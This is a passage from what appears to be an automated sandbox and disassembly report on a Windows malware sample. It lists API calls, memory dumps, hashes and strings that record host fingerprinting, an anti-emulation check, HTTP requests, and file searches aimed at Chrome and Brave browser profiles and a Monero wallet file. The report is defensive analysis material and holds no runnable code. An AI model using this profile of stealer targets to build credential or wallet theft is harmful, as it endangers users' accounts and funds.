                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 84d659ccf11cc81e91665b45ee3653fb782ebe2a48ab03394a8831dc3a10e817
                        • Instruction ID: dba8a6414fe459658960aac8c7d083c4b8685f015493f14fb9aa4845b201f2e1
                        • Opcode Fuzzy Hash: 84d659ccf11cc81e91665b45ee3653fb782ebe2a48ab03394a8831dc3a10e817
                        • Instruction Fuzzy Hash: 96115E31A01089EBDB14FF74DD90AED7338AF60210F804158F88B4B594EF78AB0ACB90
                        Function 010178E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01017910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01017917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0101792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 43b2fc19d6f4f879c5b9401a6e5670f06f016c13127219255556d34217ce918f
                        • Instruction ID: 76799c8f47c6fc9dcdf894da853776df2d69752832cbf4562ace2758fe54fe12
                        • Opcode Fuzzy Hash: 43b2fc19d6f4f879c5b9401a6e5670f06f016c13127219255556d34217ce918f
                        • Instruction Fuzzy Hash: 3F01A9B1944204EFD710DF99D949BAEBBF8F704B11F10425AF546E3284C37855048BA1
                        Function 01001110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0100112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 01001132
                        • ExitProcess.KERNEL32 ref: 01001143
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: 67505a5fda84d15429c014f2785630c48439c6f2e9dd10a70808eda29af1ce64
                        • Instruction ID: b14bc6418a705a58dce4af23809a07362c270a096ef0273ab066f58b4f480002
                        • Opcode Fuzzy Hash: 67505a5fda84d15429c014f2785630c48439c6f2e9dd10a70808eda29af1ce64
                        • Instruction Fuzzy Hash: F5E0E674A85308FBF765ABA4AC0EB4D76B8EF04B05F504054F70A771C4D6B566009799
                        Function 010010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 010010B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 010010F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: 98801fbb23e47293fd8b923853a34f13eb9b81907d87740e47513c3bad0870bf
                        • Instruction ID: 5c96b6e6e571e3fe4821ae4bab897c2962a37e5bbbfb881e9e6628720045d020
                        • Opcode Fuzzy Hash: 98801fbb23e47293fd8b923853a34f13eb9b81907d87740e47513c3bad0870bf
                        • Instruction Fuzzy Hash: C2F0E271681208BBF724DAA8AC49FAEB7E8E705B15F300448F685E7280D5719F00CBA0
                        Function 01001190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 010178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 01017910
                          • Part of subcall function 010178E0: RtlAllocateHeap.NTDLL(00000000), ref: 01017917
                          • Part of subcall function 010178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0101792F
                          • Part of subcall function 01017850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,010011B7), ref: 01017880
                          • Part of subcall function 01017850: RtlAllocateHeap.NTDLL(00000000), ref: 01017887
                          • Part of subcall function 01017850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0101789F
                        • ExitProcess.KERNEL32 ref: 010011C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: caffcafe89c403ed20d3a5dc8f7bb6bb0a0ab7afa12dfffee24ca1d6aa240d23
                        • Instruction ID: 619defe7dd262cb30b550764b9518d2ab2a7f69d4d4f5212bbb4f0d7c03796fb
                        • Opcode Fuzzy Hash: caffcafe89c403ed20d3a5dc8f7bb6bb0a0ab7afa12dfffee24ca1d6aa240d23
                        • Instruction Fuzzy Hash: 53E012BADD030257EA2573B4BC09BAA329C6B14245F040424ED4AD314AFA29E50187E5

                        Non-executed Functions

                        Function 010138B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 010138CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 010138E3
                        • lstrcat.KERNEL32(?,?), ref: 01013935
                        • StrCmpCA.SHLWAPI(?,01020F70), ref: 01013947
                        • StrCmpCA.SHLWAPI(?,01020F74), ref: 0101395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 01013C67
                        • FindClose.KERNEL32(000000FF), ref: 01013C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: c81ca4d36fe1cffbb6dc2b74866e0fb1a32a7692f0b1fc78fc6f180041b2b776
                        • Instruction ID: 7a8de3eebd6ab357f5e8a8275d9be078786f83730fbb613c01d512d0f467d42d
                        • Opcode Fuzzy Hash: c81ca4d36fe1cffbb6dc2b74866e0fb1a32a7692f0b1fc78fc6f180041b2b776
                        • Instruction Fuzzy Hash: 54A182B5A402199BDB34DFA4DC88FEE7378BB58300F044588E64E9B148EB759B84CF61
                        Function 0100BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • FindFirstFileA.KERNEL32(00000000,?,01020B32,01020B2B,00000000,?,?,?,010213F4,01020B2A), ref: 0100BEF5
                        • StrCmpCA.SHLWAPI(?,010213F8), ref: 0100BF4D
                        • StrCmpCA.SHLWAPI(?,010213FC), ref: 0100BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0100C7BF
                        • FindClose.KERNEL32(000000FF), ref: 0100C7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 20563c154d2c125edc27823fb811226ab4b32f330038ab7f1bf0d85966ed07b4
                        • Instruction ID: e9a0dd610beb00ea14a235589729405ceb21805b4f84d13a48229a3f205e5fab
                        • Opcode Fuzzy Hash: 20563c154d2c125edc27823fb811226ab4b32f330038ab7f1bf0d85966ed07b4
                        • Instruction Fuzzy Hash: B842A372A00145EBDB15FB70DD95EED733DAB64300F404598E98B97084EF38AB4ACBA1
                        Function 01014910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0101492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 01014943
                        • StrCmpCA.SHLWAPI(?,01020FDC), ref: 01014971
                        • StrCmpCA.SHLWAPI(?,01020FE0), ref: 01014987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 01014B7D
                        • FindClose.KERNEL32(000000FF), ref: 01014B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: f0ce6d5abd76b0e2daea5807673210387392281f0b05849f679a9cb0295bb276
                        • Instruction ID: 5c4ac8cf2fc4315c4d64e573b7ee7ee5edfbccd6cf1d43c5ce94541862781d5b
                        • Opcode Fuzzy Hash: f0ce6d5abd76b0e2daea5807673210387392281f0b05849f679a9cb0295bb276
                        • Instruction Fuzzy Hash: C86175B6940219ABDB34EBA0EC48EEA73BCFB58700F00458CF64A97048EB759745CF90
                        Function 01014570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 01014580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01014587
                        • wsprintfA.USER32 ref: 010145A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 010145BD
                        • StrCmpCA.SHLWAPI(?,01020FC4), ref: 010145EB
                        • StrCmpCA.SHLWAPI(?,01020FC8), ref: 01014601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0101468B
                        • FindClose.KERNEL32(000000FF), ref: 010146A0
                        • lstrcat.KERNEL32(?,0189E968), ref: 010146C5
                        • lstrcat.KERNEL32(?,0189DBE0), ref: 010146D8
                        • lstrlen.KERNEL32(?), ref: 010146E5
                        • lstrlen.KERNEL32(?), ref: 010146F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: 8d870de23b0c5d6305f75ebb088d4a83209aa93cf0ea228443eaf8a1c6f8401f
                        • Instruction ID: 32f342dd1b9ad183bc1108be727bdb32aac825b41747e6068d59b67589f91e2f
                        • Opcode Fuzzy Hash: 8d870de23b0c5d6305f75ebb088d4a83209aa93cf0ea228443eaf8a1c6f8401f
                        • Instruction Fuzzy Hash: 5A5166B69402189BD774EB70DC8CFED737CAB58300F404589F64A97188EB7497858F91
                        Function 01013EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 01013EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 01013EDA
                        • StrCmpCA.SHLWAPI(?,01020FAC), ref: 01013F08
                        • StrCmpCA.SHLWAPI(?,01020FB0), ref: 01013F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0101406C
                        • FindClose.KERNEL32(000000FF), ref: 01014081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: 37bfc6ded9fdfa87e6bcfba560330fc0b65ebe5de491002abe070d162e337d4c
                        • Instruction ID: dd660f31ed6abd993c748daba537c7cbbb49136df51ba43b554485e1d0883808
                        • Opcode Fuzzy Hash: 37bfc6ded9fdfa87e6bcfba560330fc0b65ebe5de491002abe070d162e337d4c
                        • Instruction Fuzzy Hash: 175178B6940219ABDB25EBB0DC49EEA737CFB58300F04458CF69A97084DB75D7858F50
                        Function 0100ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0100ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 0100ED55
                        • StrCmpCA.SHLWAPI(?,01021538), ref: 0100EDAB
                        • StrCmpCA.SHLWAPI(?,0102153C), ref: 0100EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0100F2AE
                        • FindClose.KERNEL32(000000FF), ref: 0100F2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
